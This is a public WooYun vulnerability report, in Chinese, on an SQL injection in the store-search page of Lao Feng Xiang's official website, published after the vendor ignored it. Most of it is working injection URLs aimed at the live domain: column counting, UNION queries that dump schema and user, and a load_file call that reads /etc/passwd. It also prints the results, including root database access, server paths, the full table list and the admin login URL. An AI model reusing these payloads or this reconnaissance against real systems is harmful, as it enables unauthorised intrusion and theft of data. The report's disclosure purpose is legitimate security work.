当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-050873

漏洞标题:老凤祥官网SQL注入致数据库敏感信息泄露

相关厂商:老凤祥官网

漏洞作者: RedFree

提交时间:2014-02-13 18:53

修复时间:2014-03-30 18:54

公开时间:2014-03-30 18:54

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-02-13: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-03-30: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

上海老凤祥有限公司官网在查询各省门店时未过滤参数,致SQL注入。

详细说明:

Order by 查字段数

http://www.laofengxiang.com/stores.php?area=%BA%D3%C4%CF%') order by 10%23


1.jpg


http://www.laofengxiang.com/stores.php?area=%BA%D3%C4%CF%') order by 11%23


2.jpg


http://www.laofengxiang.com/stores.php?area=%BA%D3%C4%CF%') union select 1,2,3,4,5,6,7,8,9,10%23


3.jpg


http://www.laofengxiang.com/stores.php?area=%BA%D3%C4%CF%') union all select 1,2,3,`SCHEMA_NAME`,5,6,7,8,9,10 from information_schema.SCHEMATA%23


4.jpg


http://www.laofengxiang.com/stores.php?area=%BA%D3%C4%CF%') union select 1,2,3,user(),5,6,7,8,9,10%23


5.jpg


http://www.laofengxiang.com/stores.php?area=%BA%D3%C4%CF%' or AGENTS_AREA is not null) and 1=2 UNION SELECT 1,2,3,load_file(char(47,101,116,99,47,112,97,115,115,119,100)) ,5,6,7,8,9,10%23


6.jpg


当前库:laofengxiang
当前用户:root@localhost
数据库版本:5.1.61-0ubuntu0.10.10.1
数据库路径:/var/lib/mysql/
网站物理路径:/var/www/laofengxiang/


所有表和对应的数据库信息:

lfx_about 	laofengxiang
lfx_admin laofengxiang
lfx_admin_menu laofengxiang
lfx_admin_pru laofengxiang
lfx_admin_prucode laofengxiang
lfx_admin_prucode_group laofengxiang
lfx_admin_role laofengxiang
lfx_agents laofengxiang
lfx_attach_list laofengxiang
lfx_celebrity laofengxiang
lfx_config laofengxiang
lfx_ebook laofengxiang
lfx_friendlink laofengxiang
lfx_job laofengxiang
lfx_leavemsg laofengxiang
lfx_mail laofengxiang
lfx_mail_attach laofengxiang
lfx_mail_list laofengxiang
lfx_module_list laofengxiang
lfx_module_news_1 laofengxiang
lfx_module_news_1_attach laofengxiang
lfx_module_news_1_type laofengxiang
lfx_module_pic_2 laofengxiang
lfx_module_pic_2_attach laofengxiang
lfx_module_pic_2_type laofengxiang
lfx_module_product_3 laofengxiang
lfx_module_product_3_attach laofengxiang
lfx_module_product_3_type laofengxiang
lfx_module_product_5 laofengxiang
lfx_module_product_5_attach laofengxiang
lfx_module_product_5_type laofengxiang
lfx_module_video_4 laofengxiang
lfx_module_video_4_type laofengxiang
lfx_office laofengxiang
lfx_product laofengxiang
lfx_product_attach laofengxiang
lfx_product_type laofengxiang
lfx_settings_indexpic laofengxiang
lfx_solution laofengxiang
lfx_solution_customer laofengxiang
lfx_solution_expert laofengxiang
lfx_solution_type laofengxiang
lfx_solution_video laofengxiang
lfx_video laofengxiang
ht_admin lfx
ht_admindown lfx
ht_channel lfx
ht_concerninfo lfx
ht_menu lfx
ht_news lfx
ht_popedom lfx
ht_store lfx
ht_user lfx
ht_vip lfx
users pureftpd


站点phpinfo:
http://www.laofengxiang.com/phpinfo.php
管理后台:
http://www.laofengxiang.com/admin/login.php

漏洞证明:

4.jpg


当前库:laofengxiang
当前用户:root@localhost
数据库版本:5.1.61-0ubuntu0.10.10.1
数据库路径:/var/lib/mysql/
网站物理路径:/var/www/laofengxiang/

修复方案:

过滤参数。

版权声明:转载请注明来源 RedFree@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝